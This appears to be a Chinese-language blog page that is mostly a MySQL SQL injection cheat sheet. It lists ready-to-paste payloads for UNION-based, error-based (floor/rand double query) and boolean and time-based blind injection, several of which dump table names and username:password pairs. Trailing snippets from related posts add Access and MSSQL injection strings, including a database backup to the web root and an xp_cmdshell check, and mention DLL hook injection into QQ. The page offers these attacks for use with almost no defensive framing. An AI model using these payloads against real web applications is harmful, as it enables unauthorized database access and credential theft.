常见注入语句

#常规注入
‘ --+
‘ --%20
‘ #
‘ %23
‘ and 1=1 --+
‘ and 1=2 --+
‘ and 1=2 union select * from admin --+
‘ and 1=2 union select * from user --+
‘ and 1=2 union select * from users --+
#爆字段长度
‘ order by 1 --+
‘ order by 2 --+
‘ order by 3 --+
‘ order by 4 --+
‘ order by 5 --+
‘ order by 6 --+
‘ order by 7 --+
‘ order by 8 --+
‘ order by 9 --+
‘ order by 10 --+
#爆数据库信息,这仅限于字段长度为1
‘ and 1=2 union all select version() --+
‘ and 1=2 union all select user() --+
‘ and 1=2 union all select database() --+
#判断操作系统
‘ and 1=2 union all select @@global.version_compile_os from mysql.user --+
#数据库权限,返回正常说明root权限;
‘ and ord(mid(user(),1,1))=114 --+
#爆数据
‘ and 1=2 union select user(),version(),database(),@@datadir,SCHEMA_NAME,current_user(),7,8,9,10 from information_schema.SCHEMATA limit 0,1 --+
‘ and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1--+
‘ and 1=2 union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=table_name limit 0,1--+
‘ and 1=2 union select 1,2,3,group_concat(COLUMN_NAME),5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=table_name limit 0,1--+
‘ and 1=2 union select 1,2,3,group_concat(username),5,6,7,8,9,10 from table_name --+
‘ and 1=2 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10 from table_name --+

#不使用注释符
‘ and ‘1
‘ union select 1 and ‘1
‘ union select 1,2 and ‘1
‘ and 1=2 union select 1,version(),3 and ‘1
‘ or ‘1 

#带括号防注入
‘) --+
‘) --%20
‘) #
‘) %23

#双引号防注入
" --+
" --%20
" #
" %23

#双引号+括号
") --+
") --%20
") #
") %23

#双查询输入
#统计有多少字段
select count(*) from table_name;
#随机数生成
select rand();
select rand()*4;
#浮点数
select floor(rand());
select floor(rand()*4);
#别名
select floor(rand()*4) as query;
#分组
select username,password from user group by username;
#两次查询
select(select database());
#连接字符串concat(str1,str2)
select concat((select database()));
select concat(0x3a,0x3a,(select database()),0x3a,0x3a);
select concat(0x3a,0x3a,(select database()),0x3a,0x3a) as query;
select concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2)) as query;
select concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2)) as query from user;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2)) as query from user group by query;
select count(*),concat(0x3a,0x3a,(select user()),0x3a,floor(rand()*2)) as query from user group by query;
select count(*),concat(0x3a,0x3a,(select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query;

‘ and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query) as test) --+
‘ and 1=2 union (select * from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query) as test) --+

#盲注
#bool型盲注
select database();
#判断长度
select length(database());
#截取字符串substr(str,num1,num2) num1:从第几个开始取;num2:取多少个
select substr(database(),1,1);
#ascii码
select ascii(substr(database(),1,1));

‘ and 1<2 --+
‘ and (ascii(substr((select database()),1,1)))=98--+

#时间型盲注
#睡眠
select sleep(1);
#进行判断
select if((select database())="bloodzero",sleep(10),null);

‘ and sleep(10) --+
‘ and if((select database())="bloodzero",sleep(10),null)--+
时间: 2024-10-05 10:20:37

常见注入语句的相关文章

access注入语句

先猜表:and exists (select *from 表名) and ''=' ' and exists(select * from admin) and ''=' 显示正常,说明有admin表.下面来猜字段 ' and exists(select 段名 from admin)and ''=' ' and exists(select name from admin) and ''='   存在字段name ' and exists(select pass from admin) and ''

PDMS二次开发之PML开发一些常见查询语句

1.查找session 以及session number var !DBname DBname !db = object db(!DBname) !session = !db.lastsession() 下面是查询结果截图 q var !db q var !sessioon.number 2.从某个时间段到当前,模型的差异文件判断模型是否发生修改,并写入文件. alpha log /$!file  overwrite DIFFERENCE $!ojbName SINCE 15:36 14 May

SQL注入语句 (很全)

1.返回的是连接的数据库名and db_name()>02.作用是获取连接用户名and user>03.将数据库备份到Web目录下面;backup database 数据库名 to disk='c:\inetpub\wwwroot\1.db';--4.显示SQL系统版本and 1=(select @@VERSION) 或and 1=convert(int,@@version)--5.判断xp_cmdshell扩展存储过程是否存在and 1=(SELECT count(*) FROM maste

SQL报错注入的12个函数及sql注入语句

转来的 侵删 1.通过floor报错,注入语句如下: and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); 2.通过ExtractValue报错,注入语句如下: and extractvalue(1, concat(0x5c, (select table_name from information_schema.tab

常见注入手法第四讲,SetWindowsHookEx全局钩子注入.以及注入QQ32位实战.

常见注入手法第四讲,SetWindowsHookEx全局钩子注入.以及注入QQ32位实战. PS:上面是操作.最后是原理 一丶需要了解的API 使用全局钩子注入.我们需要了解几个WindowsAPI. 不需要太多. 1. 设置钩子API HHOOK WINAPI SetWindowsHookEx( _In_ int idHook, 设置钩子的类型.意思就是我要设置的钩子是什么钩子. 可以是监视窗口过程.可以是监视消息队列. _In_ HOOKPROC lpfn, 根据钩子类型.设置不同的回调函数

MSSQL注入语句

(1)                                                                                  判断数据库类型:                                                                                   Access:  aNd aSc(cHr(97))=97 and exists(select id from MSysAccessObjects)

Mysql注入语句

Mysql sqlinjection code # %23 -- /* /**/   注释 UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67

ctf中常见注入题源码及脚本分析

1.代码审计发现 这里没有用escape_string,因此存在注入. 1 function show($username){ 2 global $conn; 3 $sql = "select role from `user` where username ='".$username."'"; 4 $res = $conn ->query($sql); 5 if($res->num_rows>0){ 6 echo "$username i

渗透常用手工SQL注入语句合集

1.判断有无注入点; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等..and 0<>(select count(*) from *)and 0<>(select count(*) from admin) -判断是否存在admin这张表 3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个and 0<(select count(*) from admi